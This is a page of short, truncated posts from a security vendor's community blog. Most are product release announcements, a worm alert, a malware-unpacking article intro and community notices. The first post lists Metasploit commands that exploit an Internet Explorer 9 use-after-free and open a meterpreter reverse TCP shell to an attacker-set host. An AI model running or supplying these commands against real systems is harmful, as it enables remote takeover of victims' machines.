Security Community Blog
Showing posts tagged with Critical System Protection
Fabiano.Pessoa | 27 Sep 2012 | 0 comments

Hello
A vulnerability in IE 9 was discovered on 17/09/2012, which can be exploited with the following commands in BackTrack 5 R2:

Metasploit:

- msfupdate
- use exploit/windows/browser/ie_execcommand_uaf
- set SRVHOST 192.168...
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168...
- exploit

Let's be careful on our networks.

Hugs

Beverly van de Velde | 29 Mar 2012 | 0 comments

Education Enablement Services is developing a Symantec Cloud Security Essentials course that combines the CSA training in order to achieve the CCSK credential & a Symantec Certified Professional (SCP) in Cloud Security credential. 

This is an open call for your experiences with reviewing, designing, or implementing security solutions in a cloud environment.  These could come from situations unique to the cloud (ex. compliance issues for systems in a public cloud) - OR - general security solutions addressed in cloud environments (ex. how existing encryption policies were applied to a cloud architecture). 

We need your:
• Specific examples of security solutions in cloud environments
• Example cloud architectures – good or bad – implemented by customers
• Key questions, challenges, and concerns from customers migrating their infrastructure to...

rscovel | 19 Dec 2011 | 4 comments

Symantec Protection Center 2.1 (SPC) has been released!

The Symantec Protection Center Team is proud to announce the release of Symantec Protection Center 2.1 (2.1.0.2075), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects, as well as several major enhancements.

These enhancements include:

  • New Security Audit functionality, and reports
  • New Intrusion Detection System (IDS) signature reports
  • An enhanced Specific Endpoint report
  • SPC Web Interface security certificate management
  • Updated browser compatibility

Full details are found in the SPC 2.1 Release notes (DOC4967...

Stuart_Hawkins | 16 Dec 2011 | 0 comments

Many organizations are using Critical System Protection to monitor system activity and alert if and when a host has been compromised. As the attacks on servers become more sophisticated, it’s becoming more important for organizations to block malicious activity automatically - whether the attack originates from internal or external parties - to prevent further incursion of their environment.

What has prevented a number of customers from moving to host IPS is the fear of false positives, and what impact the prevention may have on the applications or server workloads being supported.

With the most recent release of Critical System Protection, customers are now able to selectively enable prevention policies without the fear of stopping critical business processes.

Targeted Prevention Policy (available in the...

Dinesh Theerthagiri | 17 Nov 2011 | 1 comment

This article presents information on manual unpacking of protected malicious Windows executables using the OllyDbg debugger. It also involves fully rebuilding the import table so the file can be restored to its original state and executed. Many anti-virus vendors categorize UPX, NsPack, ASpack and many other PE packers as malicious software.

Packers ???

A 'Packer' is a compression routine that squeezes an executable file. These programs were created to reduce disk space and make downloads faster. Packing makes it difficult to understand the original file and makes it tricky to match the file signature of a compressed file. Packers initially send PE internal structures and then identify the PE header, export table, and import table in new structures and attach a code segment before the OEP, called the STUB, i.e. the compressed executable is shifted to the data section of the newly created file. The PE header & section header are no longer useful since data is compressed means...

rscovel | 25 Oct 2011 | 0 comments

The Protection Center Team is proud to announce the release of Symantec Protection Center 2.0 Release Update 1 (SPC RU1), which was published today to the LiveUpdate Publishing Service.  SPC 2.0 Customers will be notified that an update to SPC is available for download.  This is a LiveUpdate release only.  This update provides fixes for a small number of defects and also the ability for SPC customers with Symantec Web Gateway (SWG) 5.0.2 (and later) and Symantec Critical Systems Protection (CSP) 5.2.8 (and later) applications to integrate with the SPC Dashboard. 

Symantec Protection Center is a centralized security management console that enables organizations to identify emerging threats, prioritize tasks and accelerate time to protection based on relevant, actionable intelligence. Through a combination of process automation and security intelligence, it enables users to take timely, targeted action to remediate incidents and proactively...

Brandon Noble | 01 Sep 2011 | 0 comments

Over the weekend, Microsoft and F-Secure issued warnings about a new global threat called “Morto”, and the Internet Storm Center has been seeing a large spike in traffic on port 3389.

The spike looks to have been caused by the RDP (Remote Desktop) portion of the worm calling around looking for RDP connections. Once it finds one, it uses a small list of weak passwords and... pwnage ensues.

Symantec detects this threat as W32.Morto, and Security Response will continue to perform deeper analysis throughout the next several days. So far, they have uncovered several dozen different MD5s that are all part of this same threat family.

Signs of Morto in your environment

As we learned with W32.Downadup:
Brute force attacks + Small list of passwords = Account lockouts.

As with any...

SecuredThatToo | 17 Feb 2011 | 1 comment

Symantec just announced a pretty cool, interactive, free tool to help stay abreast of security trends and activities.  It even has historical data!  There’s an online version, an installable Windows gadget and you can access it via your mobile phone!  It's pretty slick!

Online Web Portal:
http://www.nortoncybercrimeindex.com

Windows Gadget Download:
http://www.norton.com/ProtectYourself

Mobile:
http://www.nortoncybercrimeindex.mobi

Check it out!!!

Thanks,
Min Ju

Hear4U | 08 Sep 2010

Here's your chance to be "King for a Week" with our new Security Solutions Contest! 

What Is the Security Solutions Contest?
It's all about solving end user questions in the forums area.  We created this contest to help increase the total number of solutions on the Security Community.  We are going to select threads we'd like you to solve, and give you an opportunity to win a weekly prize. Yes, I said "weekly!"  Keep reading to find out more about the prize!

How Do I Participate?
First, if you want to play, pull out your dust-ridden, coffee-stained endpoint protection & related security product manuals, re-read all the latest and greatest knowledge base articles, and put your thinking caps on!

Why?  Because to be the "King for a Week" in this contest, you need to be able to solve popular forum threads that will be hand...

Hear4U | 30 Aug 2010 | 0 comments

Threat of cybercrime grows across the globe

Cybercrime is a growing concern for SMBs and individuals around the world. As part of National Cyber Security Awareness Week, an initiative of the Australian Government, a Symantec survey revealed that 56 percent of SMBs in Australia were affected by cybercrime in 2009, up 10 percent from 2008. While increases in both the amount and complexity of attacks are to blame, the change can also be attributed to the decline in IT budgets over the past year.

To fight this growing international trend, governments have gotten involved. The Mexican Senate recently passed the Federal Data Protection Act, a new law on data protection that will levy penalties up to $1.5 million for violators of the law. Jurisdiction for the country’s Federal Institute of Access to Information and Data Protection will expand to cover the protection of personal information of private individuals and entities, helping to guarantee data...